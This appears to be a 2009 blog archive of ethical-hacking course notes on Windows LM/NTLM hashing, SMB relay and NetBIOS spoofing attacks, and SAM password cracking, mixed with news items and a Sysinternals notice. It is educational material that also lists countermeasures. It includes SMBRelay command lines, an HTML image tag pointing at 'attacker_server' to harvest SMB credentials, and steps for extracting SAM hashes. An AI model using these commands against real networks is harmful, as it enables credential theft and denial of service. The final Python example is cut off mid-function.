    Microsoft Windows NT stores two types of passwords: A LAN Manager (LM) password and a Windows NT password. We have seen in our discussion in module four how the domain controller gives out an eight byte challenge and the twenty four byte challenge response the client (server or workstation) replies with. These hashes are transmitted without encryption over the network. If the domain controller authenticates the challenge response, it replies with an NT session key and a LAN Manager (LM) session key. These session keys are encrypted between the client and the Domain Controller.

    Let us now take a look at the LAN Manager hash. LAN Manager uses a fourteen byte password. If the password is shorter than fourteen bytes, it is padded with zeros. After conversion to upper case, it is split into two seven byte halves. From each seven byte half an eight byte odd-parity DES key is constructed. Each eight byte DES key is used to encrypt a fixed "magic number". The two results are concatenated into a sixteen byte one-way hash value. This value is the LAN Manager one-way hash of the password.

    It is easy for password crackers to detect whether a password has an eighth character when the LM hash is used, because the second half of a seven-character-or-shorter password hashes to a constant value. The challenge response can then be brute-forced for the LM hash. The number of possible combinations in an LM password is low compared to the Windows NT password.

    While encryption schemes such as Kerberos are considered an effective countermeasure, the Windows 9x and Windows NT operating systems cannot use the Kerberos version 5 protocol for authentication. Therefore, in Windows Server 2003 as well, these systems authenticate by default with both the LM and NTLM protocols for network authentication. What is possible, though, is for Windows 9x and Windows NT to use a more secure authentication protocol such as NTLMv2. For the logon process, NTLMv2 uses a secure channel to protect the authentication process. These systems therefore have to set LAN Manager Authentication Level to "Send NTLMv2 responses only".
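    The steps above carried out in code, as an added example written for this post (it is not from the original course material): uppercase, pad to 14 bytes with nulls, split into two 7-byte halves, build an 8-byte odd-parity DES key from each, encrypt the constant "KGS!@#$%" under each key, and concatenate. It uses Go's standard crypto/des; the function names (LMHash, SecondHalfIsEmpty) are my own, and only ASCII passwords are handled. The second-half check is the property that gives away whether a password is longer than seven characters.

```go
package main

import (
	"crypto/des"
	"encoding/hex"
	"fmt"
	"math/bits"
	"strings"
)

// lmMagic is the fixed plaintext ("magic number") that each half-key encrypts.
const lmMagic = "KGS!@#$%"

// desKeyFrom7 expands a 7-byte half into an 8-byte DES key: the 56 bits are split
// into eight 7-bit groups, each shifted left one position so the low bit of every
// key byte can carry odd parity.
func desKeyFrom7(half []byte) []byte {
	var v uint64
	for _, b := range half {
		v = v<<8 | uint64(b)
	}
	key := make([]byte, 8)
	for i := 7; i >= 0; i-- {
		k := byte(v&0x7F) << 1
		if bits.OnesCount8(k)%2 == 0 { // make the byte odd parity
			k |= 1
		}
		key[i] = k
		v >>= 7
	}
	return key
}

// lmHalf encrypts the magic constant with the key derived from one 7-byte half.
func lmHalf(half []byte) ([]byte, error) {
	block, err := des.NewCipher(desKeyFrom7(half))
	if err != nil {
		return nil, err
	}
	out := make([]byte, 8)
	block.Encrypt(out, []byte(lmMagic))
	return out, nil
}

// LMHash returns the 32-hex-character LM hash of an ASCII password.
func LMHash(password string) (string, error) {
	pw := []byte(strings.ToUpper(password))
	if len(pw) > 14 {
		pw = pw[:14] // LM silently ignores anything past 14 characters
	}
	padded := make([]byte, 14) // zero bytes are the null padding
	copy(padded, pw)
	h1, err := lmHalf(padded[:7])
	if err != nil {
		return "", err
	}
	h2, err := lmHalf(padded[7:])
	if err != nil {
		return "", err
	}
	return strings.ToUpper(hex.EncodeToString(append(h1, h2...))), nil
}

// SecondHalfIsEmpty reports whether the password had seven characters or fewer:
// the second half is then the well-known hash of seven null bytes.
func SecondHalfIsEmpty(lmHex string) bool {
	return len(lmHex) == 32 && lmHex[16:] == "AAD3B435B51404EE"
}

func main() {
	// "123456qwerty" is the password from the worked example in the text.
	for _, pw := range []string{"", "password", "123456qwerty"} {
		h, err := LMHash(pw)
		if err != nil {
			panic(err)
		}
		fmt.Printf("%-14q -> %s (7 chars or fewer: %v)\n", pw, h, SecondHalfIsEmpty(h))
	}
}
```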

    ---Regards,

    Amarjit Singh

    Wednesday, April 22, 2009

    Nokia 1100 handsets may be vulnerable to hacking

    Incidents of Nokia 1100 handsets being in demand for prices as high as $33,000 in some cases, and the subsequent investigations by agencies, have revealed that the model retains login details of transactions carried out through it and can therefore be misused by hackers.

    This was revealed by Netherlands-based Ultrascan Advanced Global Investigations, which was roped in by the police to investigate why people were ready to pay so much for an old model of handset.

    Handsets manufactured at Nokia's Bochum, Germany plant are reported to be prone to such hacking, not the entire range.

    Source: http://www.telecomtiger.com

    ---Regards,
    Amarjit Singh

    Computers Worldwide Hit By Cyber Hackers

    A small group of cyber criminals have succeeded in hacking into almost two million computers around the world - including British Government machines.

    The global network of 1.9m computers, infected with malicious software, or malware, was tracked to a cyber gang of six people based in the Ukraine.
    The malware was remotely controlled by the gang, allowing them to read emails, copy files, record keystrokes, send spam and make screenshots, security firm Finjan said.


    The criminal network of remotely controlled computers, known as a botnet, was the largest ever discovered, Finjan said - its server has now been shut down.
    The botnet started operating in February, infecting consumer, corporate, and government machines.

    By far the highest number of infected machines was found in the US, with 45% of the total while the UK's 115,000 affected machines accounted for 6% of the total.



    The malware infects computers running the Windows XP operating system using vulnerabilities in web browsers such as Internet Explorer and Firefox.
    It installs itself on computers when a legitimate but compromised website is visited; computer users do not have to click on a specific link or download any programmes for the malware to take effect.

    "As predicted at the end of last year, cyber criminals keep on looking for improved methods to distribute their malware and Trojans are winning the race," said Yuval Ben-Itzhak, Finjan's chief technology officer.

    "The sophistication of the malware and the staggering amount of infected computers proves that cyber gangs are raising the bar."

    The gang members, who have not been caught, were selling access to the compromised machines on a hackers' forum in Russia, auctioning access to 1,000 computers at a time for around £75 a day.

    Mr Ben-Itzhak said key loggers could also be used to obtain credit card details for the gang's own use or to be sold on.

    A spokesman for the Cabinet Office, which sets standards for the use of information technology across Government, said he could not give details of the departments involved while police said they were aware of the botnet and taking "appropriate action".

    Source: http://news.sky.com

    ---Regards,
    Amarjit Singh

    SMB Hacking Tools

    Hacking Tool: SMB Grind

    SMBGrind increases the speed of L0phtCrack sessions on sniffer dumps by removing duplication and providing a facility to target specific users without having to edit the dump files manually.

    Without such filtering, password cracking against a sniffer dump is a time-consuming, laborious process unless it is targeted at particular accounts; removing duplicate entries and selecting specific users before cracking is what makes the L0phtCrack session faster.

    If an attacker can force a NetBIOS connection from its target it can retrieve the user authentication information of the currently logged in user. On its part SMB protocol uses a challenge-response method of authentication to prevent replay attacks and complicate cracking. The challenge is eight bytes of randomly generated data which the client encrypts using the password as an encryption key. If this can be obtained, the session can be hijacked as well. But this is not always easy.

    SMBGrind is a tool that seeks to solve this problem and make password cracking by L0phtCrack faster. It removes duplicates and saves the filtered file to disk, and the attacker can e-mail the filtered file directly from within SMBGrind via the File-Send menu option.

    Hacking Tool: SMBDie

    The SMBDie tool crashes computers running Windows 2000/XP/NT by sending a specially crafted SMB request.

    SMBDie is another tool that takes advantage of the implementation of a protocol by a vendor. The vulnerability results because of a flaw in the way Microsoft's implementation of SMB receives a packet requesting the SMB service. Two SMB exploit programs - SMBDie and smbnuke exploit the vulnerability the same way.

    An attacker can launch a denial of service by establishing a valid SMB session to a Windows NT/2000/XP system, and then sending a specially crafted transaction packet to request the NetServerEnum2, NetServerEnum3 or NetShareEnum functions. In the SMB transaction packet, if either or both of "Max Param Count" and "Max Data Count" values are equal to zero, then the server miscalculates the length of the first buffer. This causes the next chunk in the heap to be overwritten. Once the first buffer is released then the heap will be in an inconsistent state and will cause a blue screen of death. The attacker can use both a user account and anonymous access to accomplish this.

    Any machine on the network, including systems connected via VPN, can launch this attack. All that an attacker needs is the IP address and NetBIOS name of the target system. The attack registers an entry in the system log when it is successful but does not indicate the source of the attack. Countermeasures include blocking access to SMB ports from untrusted networks: by blocking TCP ports 445 and 139 at the network perimeter, administrators can prevent the attack from untrusted parties. Additionally, the LanmanServer service can be stopped, which prevents the attack but may not be suitable on a file and print sharing server.

    Hacking Tool: NBTDeputy
    • NBTDeputy registers a NetBIOS computer name on the network and is ready to respond to NetBT name-query requests.

    • NBTDeputy helps resolve an IP address from a NetBIOS computer name. It is similar to Proxy ARP.

    • This tool works well with SMBRelay.

    • For example, SMBRelay runs on a computer as ANONYMOUS-ONE with the IP address 192.168.1.10, and NBTDeputy is also run with 192.168.1.10 specified. SMBRelay may then connect to any XP or .NET Server machine when logged-on users access "My Network Places".

    There are certain prerequisites for NBTDeputy to be effective. NetBIOS over TCP/IP must be disabled on the attacker's machine, as NBTDeputy itself uses ports 137 and 138. The user must specify a computer name that is unique on the LAN because NBTDeputy does not check for existing computer names. The user must also specify an existing workgroup on the LAN, as NBTDeputy does not become the Master Browser. NBTDeputy must be on the same LAN as the targeted XP and .NET Server machines.

    NetBIOS DoS Attack
    • Sending a 'NetBIOS Name Release' message to the NetBIOS Name Service (NBNS, UDP 137) on a target NT/2000 machine forces it to place its name in conflict, so that the system will no longer be able to use it.

    • This will block the client from participating in the NetBIOS network.

    • Tool: nbname

      • NBName can disable entire LANs and prevent machines from rejoining them.

      • Nodes on a NetBIOS network infected by the tool will think that their names already are being used by other machines.

    NetBIOS is a set of defined software interfaces for vendor-independent PC networking and is primarily used on Microsoft Windows computers. The NetBIOS Name Service (NBNS) provides a means for hostname and address mapping on a NetBIOS-aware network. In Microsoft's implementation of the NBNS Name Server (Microsoft WINS Server) they mapped group names to the single IP address 255.255.255.255 (the limited broadcast address). In order to support real group names, Microsoft modified WINS to provide support for special groups. These groups appear differently in WINS. However, since an authentication mechanism has not been defined for NetBIOS running over TCP/IP protocol, all systems running NetBIOS services are vulnerable to spoofing attacks.

    For instance, an attacker can send spoofed "Name Release" or "Name Conflict" messages to a target machine and force the target machine to remove its real name from its name table (as seen with nbtstat) and not respond to other NetBIOS requests. This results in a denial of service as the legitimate machine is not able to communicate with other NetBIOS hosts.

    NBName is a tool written by Sir Dystic of the Cult of the Dead Cow. It decodes and displays all NetBIOS name packets it receives on UDP port 137.

    Using the /DENY * command line option it will respond negatively to all NetBIOS name registration packets it receives.

    Using the /CONFLICT command line option it will send a name release request for each name that is not already in conflict to machines it receives an adapter status response from.

    The /FINDALL command line option causes a wildcard name query request to be broadcast at startup and each machine that responds to the name query is sent an adapter status request.

    The /ASTAT command line option causes an adapter status request to be sent to the specified IP address, which doesn't have to be on the local network.

    Using /FINDALL /CONFLICT /DENY * will disable an entire local NetBIOS network and prevent machines from rejoining it. Nodes on a NetBIOS network affected by the tool will think that their names are already being used.
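    As an added example (not part of the original post and not NBName's code), a small Go decoder for the NBNS header and first-level encoded name, with the check a monitor on UDP 137 would apply: a Name Release request, or a negative registration response, aimed at a name this host owns is exactly the spoofing described above, and nothing in NBNS authenticates the sender. The sample packet is constructed inline; ParsePacket, Verdict and sampleRelease are names I chose.

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
	"strings"
)

// NBNS opcodes from RFC 1002, section 4.2.1.1 (query is 0x0, refresh 0x8).
const (
	OpRegistration = 0x5
	OpRelease      = 0x6
)

// Packet holds the fields a monitor on UDP 137 needs from an NBNS message.
type Packet struct {
	TransactionID uint16
	IsResponse    bool
	Opcode        uint8
	Rcode         uint8
	Broadcast     bool
	Name          string // decoded NetBIOS name, space padding stripped
	Suffix        byte   // 16th name byte: 0x00 workstation, 0x20 file server, ...
}

// encodeName applies first-level encoding: 15 characters plus a suffix byte become
// 32 bytes, each nibble mapped to 'A'..'P', carried as one DNS-style label.
func encodeName(name string, suffix byte) []byte {
	raw := []byte(fmt.Sprintf("%-15s", strings.ToUpper(name)))[:15]
	raw = append(raw, suffix)
	out := []byte{32}
	for _, b := range raw {
		out = append(out, 'A'+(b>>4), 'A'+(b&0x0F))
	}
	return append(out, 0) // empty scope terminates the name
}

// ParsePacket decodes the 12-byte header and the name in the first question.
func ParsePacket(b []byte) (Packet, error) {
	var p Packet
	if len(b) < 12 {
		return p, errors.New("short NBNS header")
	}
	p.TransactionID = binary.BigEndian.Uint16(b[0:2])
	flags := binary.BigEndian.Uint16(b[2:4])
	p.IsResponse = flags&0x8000 != 0
	p.Opcode = uint8(flags>>11) & 0xF
	p.Broadcast = flags&0x0010 != 0 // the B bit of NM_FLAGS
	p.Rcode = uint8(flags & 0xF)
	if binary.BigEndian.Uint16(b[4:6]) == 0 {
		return p, errors.New("no question section")
	}
	if len(b) < 12+1+32+1 || b[12] != 32 {
		return p, errors.New("malformed NetBIOS name label")
	}
	raw := make([]byte, 16)
	for i := 0; i < 16; i++ {
		hi, lo := b[13+2*i]-'A', b[14+2*i]-'A'
		if hi > 15 || lo > 15 { // bytes outside 'A'..'P' wrap around and land here
			return p, errors.New("invalid first-level name encoding")
		}
		raw[i] = hi<<4 | lo
	}
	p.Name = strings.TrimRight(string(raw[:15]), " ")
	p.Suffix = raw[15]
	return p, nil
}

// Verdict returns a non-empty reason when the packet is one of the two spoofing
// cases the text describes and it names a NetBIOS name this host owns.
func Verdict(p Packet, owned map[string]bool) string {
	if !owned[p.Name] {
		return ""
	}
	switch {
	case !p.IsResponse && p.Opcode == OpRelease:
		return "unsolicited NAME RELEASE request for owned name " + p.Name
	case p.IsResponse && p.Opcode == OpRegistration && p.Rcode != 0:
		return fmt.Sprintf("negative registration response (RCODE %d) for %s", p.Rcode, p.Name)
	}
	return ""
}

// sampleRelease builds a constructed (not captured) Name Release request carrying
// only the header and question section, which is all the decoder looks at.
func sampleRelease(trn uint16, name string, suffix byte) []byte {
	hdr := make([]byte, 12)
	binary.BigEndian.PutUint16(hdr[0:2], trn)
	binary.BigEndian.PutUint16(hdr[2:4], OpRelease<<11|0x0010) // request, opcode 6, B set
	binary.BigEndian.PutUint16(hdr[4:6], 1)                    // QDCOUNT = 1
	pkt := append(hdr, encodeName(name, suffix)...)
	return append(pkt, 0x00, 0x20, 0x00, 0x01) // QTYPE = NB, QCLASS = IN
}

func main() {
	owned := map[string]bool{"WORKSTATION": true}
	p, err := ParsePacket(sampleRelease(0x1234, "workstation", 0x00))
	if err != nil {
		panic(err)
	}
	fmt.Printf("trn=%#04x opcode=%d response=%v name=%q<%02x>\n",
		p.TransactionID, p.Opcode, p.IsResponse, p.Name, p.Suffix)
	if reason := Verdict(p, owned); reason != "" {
		fmt.Println("ALERT:", reason)
	}
}
```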

    ---Regards,
    Amarjit Singh

    Tuesday, April 21, 2009

    SMBRelay Weakness & Countermeasures

    • The problem is to convince a victim's client to authenticate to the MITM server.

    • You can send a malicious e-mail message to the victim client with an embedded hyperlink to the SMBRelay server's IP address.

    • Another solution is an ARP poisoning attack against the entire segment, causing all of the systems on the segment to authenticate through the fraudulent MITM server.

    Countermeasures

    • Configure Windows 2000 to use SMB signing.

    • Client and server communication will then cryptographically sign each block of SMB communications.

    • These settings are found under Security Policies / Security Options.

    There are inherent weaknesses in executing an SMBRelay attack, and the hindrances to this attack point towards the countermeasures to be adopted. Firstly, SMBRelay must be able to bind to port 139 to receive the incoming NetBIOS connections. This requires administrative privileges, as this is a port number less than 1024.

    SMBRelay targets and runs best on Windows NT and 2000 machines; connections from 9x and ME boxes will have unpredictable results. Moreover, it relies on the attacker's ability to convince the user to authenticate to the MITM server. Ways to overcome these weaknesses include sending a malicious e-mail message with an embedded hyperlink to the SMBRelay server's IP address.

    Another solution is ARP poisoning attack against the entire segment causing all of the systems on the segment to authenticate through the fraudulent MITM server. ARP traffic can be easily spoofed to reroute traffic originating from the system to the attacker's system, even in a switched environment. Rerouted traffic can be viewed with a network packet analyzer and then forwarded to the real destination in a variant of the MITM attack.

    The only real prevention against SMBRelay is to dismantle all SMB communications and to use Windows 2000 Kerberos authentication only in a native, single forest environment network (with no legacy clients) and with all applications supporting Kerberos.

    Another countermeasure, as discussed earlier in the context of the SMBRelay MITM, is to force the requirement for digitally signed SMB communications under Security Policy / Local Policies / Security Options. Though this may result in connectivity issues with NT4 systems, it can ensure adequate protection.

    While considering countermeasures, disabling NetBIOS alone is not sufficient to prevent SMB communication. This is because in the absence of standard NetBIOS ports, SMB will use Transmission Control Protocol (TCP) port 445, which is referred to as SMB Direct Host or the Common Internet File System (CIFS) port. As a result, explicit steps must be taken to disable both NetBIOS and SMB separately.

    NetBIOS uses the following ports: UDP/137 (NetBIOS name service), UDP/138 (NetBIOS datagram service) and TCP/139 (NetBIOS session service). SMB uses the following ports: TCP/139, TCP/445. On servers accessible from the Internet, SMB must be disabled by removing File and Printer Sharing for Microsoft Networks and Client for Microsoft Networks using the Transmission Control Protocol/Internet Protocol (TCP/IP) properties dialog box in the Local Area Connection properties dialog box.

    ---Regards,
    Amarjit Singh

    SMBRelay man-in-the-middle Scenario

    • The attacker in this setting sets up a fraudulent server at 192.168.234.251, a relay address of 192.168.234.252 using /R, and a target server address of 192.168.234.34 with /T.

      c:\> smbrelay /IL 2 /IR /R 192.168.234.252 /T 192.168.234.34

    • When a victim client connects to the fraudulent server thinking it is talking to the target, the MITM server intercepts the call, hashes the password and passes the connection to the target server.

    SMBRelay can also be used for session hijacking. The attacker can pose as the "man in the middle" by virtually interposing himself between the client and host. SMBRelay is the first widely distributed hack tool that automates the man-in-the-middle (MITM) attack. SMBRelay automates the process by functioning first as a data relay between the client and host, sending on all but the authentication data.

    The attacker can send a client of the targeted host an HTML e-mail message with a link to a NetBIOS share on the web server. As the target's computer attempts to establish a NetBIOS connection, the attacker steps in, intercepts the client's credentials, and passes them off as his own.

    Then the attacker disconnects the client and binds the host to a new IP relay address that the attacker can log on to, all the while maintaining the original client's host privileges. At the same time NTLM password hashes exchanged by the client and host are collected and saved to a text file.

    For example, set up a MITM server at 192.168.200.114 using the /L+ switch, a relay address of 192.168.200.252 using the /R and a target server address of 192.168.200.168 with the /T switch:

    c:\>smbrelay /IL /IR 2 192.168.200.252 /T 192.168.200.168

    A victim client, 192.168.200.120, is then coaxed into connecting to the fraudulent MITM server by deception.

    This brings us to SMBRelay2, which works at the NetBIOS level, and should work across any protocol NetBIOS is bound to (such as NetBEUI or TCP/IP). The difference is that instead of using IP addresses, SMBRelay2 uses NetBIOS names. Moreover, it supports man in the middle attack to a third host. However, the limitation of this utility is that currently it supports listening on only one name, so the target must attempt to connect to that name for SMBRelay2 to operate (the local name).

    ---Regards,
    Amarjit Singh

    SMB Hacking Tools - SMB Relay

    Hacking Tool: SMB Relay
    • SMBRelay is essentially a SMB server that can capture usernames and password hashes from incoming SMB traffic.

    • It can also perform man-in-the-middle (MITM) attacks.

    • You must disable NetBIOS over TCP/IP and block ports 139 and 445.

    • Start the SMBRelay server and listen for SMB packets:

      c:\>smbrelay /e
      c:\>smbrelay /IL 2 /IR 2

    • An attacker can access the client machine by simply connecting to it via the relay address using: c:\> net use * \\\c$

    SMBRelay, by Sir Dystic of the Cult of the Dead Cow, is essentially an SMB server that receives a connection on port 139, connects back to the connecting computer's port 139 or to another target server, and relays the packets between the client and server of the connecting Windows machine, modifying these packets when necessary.

    SMBRelay functions first as a data relay between the client and host, sending on all but the authentication data. Then the attacker disconnects the client and binds the host to a new IP relay address that the attacker can log on to, all the while maintaining the original client's host privileges. At the same time NTLM password hashes exchanged by the client and host are collected and saved to a text file.

    The usage is smbrelay [options]

    Options:

    • /D num - Set debug level; currently valid levels are 0 (none), 1 and 2. Defaults to 0.

    • /E - Enumerates interfaces and their indexes.

    • /F[-] - Fake server only: capture password hashes and do not relay. Use - to disable acting as a fake server if relay fails.

    • /IL num - Set the interface index to use when adding local IP addresses.

    • /IR num - Set the interface index to use when adding relay IP addresses. Defaults to 1.

    • /L[+] IP - Set the local IP to listen on for incoming NetBIOS connections. Use + to first add the IP address to the NIC. Defaults to the primary host IP.

    • /R[-] IP - Set the starting relay IP address to use. Use - to not add each relay IP address to the NIC. Defaults to 192.1.1.1 first.

    • /S name - Set the source machine name.

    The attacker can choose to disable TCP port 445 on the rogue server using an IPSec filter so that traffic will always flow through TCP port 139. The server can then capture both LM and NTLM hashes and write them to its working directory as hashes.txt, which can later be imported into L0phtCrack. Furthermore, the attacker's system can now access the client machine by simply connecting to it via the relay address: c:\>net use * \\192.x.x.x\c$

    On the client side (W2K), "net use" command will fail to turn up any sessions as the program throws a system error 64 and indicates that no drives are mounted. However, running "net session" will reveal that it is connected to the spoofed machine name, CDC4EVER, which SMBRelay sets by default unless changed using the "/S name" parameter.

    ---Regards,
    Amarjit Singh

    Redirecting SMB Logon to the Attacker

    Redirecting SMB Logon to the Attacker
    • Eavesdropping on LM responses becomes much easier if the attacker can trick the victim to attempt Windows authentication of the attacker's choice.

    • Basic trick is to send an email message to the victim with an embedded hyperlink to a fraudulent SMB server.

    • When the hyperlink is clicked, the user unwittingly sends his credentials over the network.

    SMB stands for Server Message Block, and is a protocol for sharing files, printers, serial ports, and communications abstractions such as named pipes and mail slots between computers. SMB is a client server, request-response protocol. Normally after clients have connected to servers using TCP/IP, NetBEUI or IPX/SPX, they can send commands (SMBs) to the server that allow them to access shares, open files, read and write files, and other file operations. The vulnerability is that in the case of SMB, these things are done over the network. SMB has been seen used over TCP/IP, NetBEUI and IPX/SPX, NetBIOS etc.

    The SMB model defines two levels of security: Primarily protection is applied at the share level on a server. Each share can have a password, and a client only needs that password to access all files under that share. This was the first security model that SMB had. The second security level is at the user level. Protection is applied to individual files in each share and is based on user access rights. Every client desiring to access resources must log in to the server and authenticate itself. Once authenticated, the client is given a UID which is to be presented on all subsequent accesses to the server. This model has been available since LAN Manager 1.0.

    While SMB password guessing is still the most effective method for gaining access to Windows systems, an unsuccessful attacker might attempt to eavesdrop on SMB logon exchanges using sniffing techniques, directly off the network with tools such as L0phtCrack's SMBCapture. SMBCapture is capable of sniffing Windows NT/2000 challenge-response authentication traffic off the network and feeding it into the L0phtCrack cracking engine.

    As an example, the following tag, embedded in the HTML of the e-mail, shows nothing in the message; but when the null GIF is loaded by the victim's Internet Explorer, the victim will automatically initiate an SMB session with attacker_server:

      <img src=file://attacker_server/null.gif height=1 width=1>

    SMBCapture will be listening on attacker_server or its local segment and the LM challenge-response will be extracted. It is also possible to use ARP redirection/cache poisoning to redirect client traffic to a designated system.

    Countermeasures include:

    • Using Windows 2000 Kerberos authentication only in a native, single forest environment network (no legacy clients) with all applications supporting Kerberos;

    • Ensuring physical security best practices; Ensuring that network access points are inaccessible to passersby;

    • Setting LAN Manager Authentication Level to "Send NTLM responses only". The NTLM response is not susceptible to SMBCapture attack; SMBCapture will maintain it is capturing but, when sent to Lophtcrack, the hashes will not crack within a reasonable time frame.

    ---Regards,
    Amarjit Singh

    Monday, April 20, 2009

    Cracking NT/2000 passwords

    Cracking NT/2000 passwords
    • The SAM file in Windows NT/2000 contains the usernames and encrypted passwords. The SAM file is located in the %systemroot%\system32\config directory [open this path using RUN]

    • The file is locked when the OS is running. Ways around this:

      • Booting to an alternate OS

      • Backup SAM from the Repair directory

        • Whenever rdisk /s is run, a compressed copy of the SAM called SAM._ is created in %systemroot%\repair. Expand this file using c:\>expand sam._ sam

      • Extract the hashes from the SAM

        • Use L0phtCrack to crack the password hashes.

    This file is usually locked when the system is in use. However, once the system is not used by any system components, it is world readable by default. Attackers are particularly vigilant to detect any possible SAM.SAV files which could be readable, as these can be used for obtaining password info.

    There are tools such as NTFSDOS that are capable of mounting any NTFS partition as a logical drive. NTFSDOS.EXE is a read-only network file system driver for DOS/Windows that is able to recognize and mount NTFS drives for transparent access. It makes NTFS drives appear indistinguishable from standard FAT drives, providing the ability to navigate, view and execute programs on them from DOS or from Windows.

    Not all is lost if the system is in use and the SAM file is locked. If a system administrator has casually forgotten to rename the administrator account or change the initial password, the attacker might be in luck because during the installation of NT/2000 a copy of the password database is put in \\WINNT\REPAIR.

    What happens if the system administrator has updated their repair disk? The attacker can then look for a copy of the repair disks and extract the password database from the SAM._ file in the ERD directory. He can then use a couple of different utilities to dump the password hashes, like pwdump, or even run L0phtCrack (which has pwdump code built in) to extract the passwords. SAMDUMP.EXE can be used to extract the user information out of it.

    ---Regards,
    Amarjit Singh

    The Windows Sysinternals

    The Sysinternals web site was created in 1996 by Mark Russinovich and Bryce Cogswell to host their advanced system utilities and technical information. Microsoft acquired Sysinternals in July, 2006. Whether you’re an IT Pro or a developer, you’ll find Sysinternals utilities to help you manage, troubleshoot and diagnose your Windows systems and applications. If you have a question about a tool or how to use them, please visit the Sysinternals Forum for answers and help from other users and our moderators.

    Sysinternals Live

    Sysinternals Live is a service that enables you to execute Sysinternals tools directly from the Web without hunting for and manually downloading them. Simply enter a tool's Sysinternals Live path into Windows Explorer or a command prompt as http://live.sysinternals.com/ or \\live.sysinternals.com\tools\.

    What's New (April 8, 2009)

    Sysinternals wishes Channel 9 a Happy Birthday!
    Channel 9, Microsoft's direct connection to developers, turned five a few days ago. Mark frequently gives interviews on Channel 9, including his latest on Windows 7 kernel changes, which is Channel 9's most viewed interview of all time at 550,000 views. Mark was one of the Niners to give Channel 9 a special birthday wish.

    What's New (March 30, 2009)

    Mark’s Blog: Pushing the Limits of Windows: Paged and Nonpaged Pool 
    Check out Mark’s latest entry in his Pushing the Limits of Windows series, where he describes the role of the kernel’s paged and nonpaged pool resources, their limits, how the system behaves when they run out, and how to track down a driver that’s leaking pool.
    Autoruns v9.40
    This Autoruns update shows manual start Windows services, fixes a bug that affected the display of autostart locations that could include multiple startup registrations, and fixes a bug in the Jump To functionality on 64-bit Windows.

    What's New (March 17, 2009)

    Process Monitor v2.04
    This update shows file mapping operations in basic mode, adds more translations of error numbers to text, fixes a bug that limited support for more boot log files larger than 4GB, and displays version numbers using the same formatting as Windows.
    TCPView v2.54
    Version 2.54 fixes bugs that prevented the display of IPv6 TCP endpoints and the correct display of IPv6 UDP endpoints.
    VMMap v1.02
    VMMap now shows all image subsections, even if they reside within the same allocation region. It also fixes a bug in image name sorting and makes the UAC elevation smoother on 64-bit Windows.

    What's New (March 2, 2009)

    Sigcheck v1.6
    This update adds checking for .NET strong signatures and extends the output of the -i option, which shows the image signers, to also print the path of the catalog that stores a file's signature.

    What's New (February 23, 2009)

    Vmmap v1.0
    Vmmap is a new utility for analyzing process address spaces and working sets. Aimed primarily at developers, its detailed graphical and textual breakdown of exactly what types of memory contribute to a process's memory footprint make it a powerful performance analysis and tuning tool.
    Mark to Speak at TechEd 2009
    Come see the 2009 version of Mark's popular "Case of the Unexplained" session, where he demonstrates the use of Sysinternals tools with real-world troubleshooting examples. Mark's Windows 7 and Windows Server 2008 R2 session expands on his Channel 9 interview to dive deep on system-level enhancements and improvements, and his Inside Windows Server 2008 R2 Virtualization and VHD Enhancements session takes you on a tour of new features like Live Migration, Second Level Address Translation, and native VHD support.

    What's New (February 4, 2009)

    Mark’s Blog: The Case of the Phantom Desktop Files
    Follow Mark’s latest investigation as he walks you through how he solved a problem ticket submitted by his wife for a perplexing issue she ran into on the kitchen computer.

    Windows 7: To the Beta and Beyond
    Join Mark Russinovich and a panel of MVPs and industry IT pros for a live discussion about Windows 7, its features and how it’s shaping up to be the best Windows yet.

    What's New (January 12, 2009)

    ZoomIt 3.0
    This major update to ZoomIt, the Sysinternals screen magnification and annotation utility, adds a LiveZoom mode on Windows Vista and higher, allows you to change the typing and break timer font, adds the ability to copy the magnified screen to the clipboard with Ctrl+C, and introduces a new configuration interface.

    What's New (January 6, 2009)

    Mark's Blog: The Case of the Crashed Phone Call
    Check out Mark's latest blog post to see how David Solomon, Mark's coauthor for the Windows Internals books, resolved a blue screen problem most likely related to an outdated driver.

    ---Regards,
    Amarjit Singh
    read more "The Windows Sysinternals"

    Password Types

    Passwords can be categorized into various types based on their composition. Let us take a look at these types to improve our understanding of password cracking: the classes of characters a password draws from decide the alphabet an attacker has to search, and its length decides how many positions that alphabet is raised to.

    • Passwords that contain only letters: As the name implies, these contain nothing but letters of the alphabet and are the easiest to crack. Example: "secret"

    • Passwords that contain only numbers: These passwords consist purely of numerals. Example: "12354"

    • Passwords that contain only special characters: These passwords consist of only special characters (punctuation and symbols). They are easy to crack, and the shorter they are, the easier. Example: "*%$%@"

    • Passwords that contain letters and numbers: These passwords were the first step towards secure passwords. They are relatively harder to crack than passwords with just letters or just numerals, because the attacker must search a larger alphabet at every position. Example: "a3rf5"

    • Passwords that contain only letters and special characters, and passwords that contain only special characters and numbers, are quite similar to the preceding type. Examples: "df%g$i", "39*&4"

    • Passwords that contain letters, special characters and numbers are considered the most secure, as the combined alphabet makes them difficult to crack. Given an appropriate length they can be considered safe, and if they are also protected properly in storage and in transit, safe on the network as well. Example: "a#d5y8%"
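
    As an added illustration (not part of the original post), the following Python classifies a password into the types listed above and sizes the brute-force search space each type implies. The class sizes are an assumption of printable ASCII (26 lowercase, 26 uppercase, 10 digits, the 32 punctuation marks in Python's string.punctuation, and the space as one more symbol), and the guess rate used in the demo is an assumed figure, not a measurement.

```python
"""Classify a password by character composition and size its brute-force search space."""
import math
import string

# Distinct symbols each character class contributes to the attacker's alphabet.
# Assumed: printable ASCII only; string.punctuation contains 32 symbols.
CLASS_SIZES = {
    "lower": len(string.ascii_lowercase),   # 26
    "upper": len(string.ascii_uppercase),   # 26
    "digit": len(string.digits),            # 10
    "special": len(string.punctuation),     # 32
    "space": 1,
}


def char_classes(password: str) -> set:
    """Return the set of character classes actually used in the password."""
    if not password:
        raise ValueError("empty password")
    classes = set()
    for ch in password:
        if ch in string.ascii_lowercase:
            classes.add("lower")
        elif ch in string.ascii_uppercase:
            classes.add("upper")
        elif ch in string.digits:
            classes.add("digit")
        elif ch in string.punctuation:
            classes.add("special")
        elif ch == " ":
            classes.add("space")
        else:
            # Non-ASCII input would need a different alphabet model; refuse rather than guess.
            raise ValueError(f"character {ch!r} is outside printable ASCII")
    return classes


def alphabet_size(password: str) -> int:
    """Smallest alphabet an attacker must search to cover every character used."""
    return sum(CLASS_SIZES[c] for c in char_classes(password))


def keyspace(password: str) -> int:
    """Number of candidates in an exhaustive search of that alphabet at that length."""
    return alphabet_size(password) ** len(password)


def entropy_bits(password: str) -> float:
    """log2 of the keyspace: the usual 'bits of strength' for a randomly chosen password."""
    return len(password) * math.log2(alphabet_size(password))


def category(password: str) -> str:
    """Map the character classes onto the password types listed in the post."""
    classes = char_classes(password)
    parts = []
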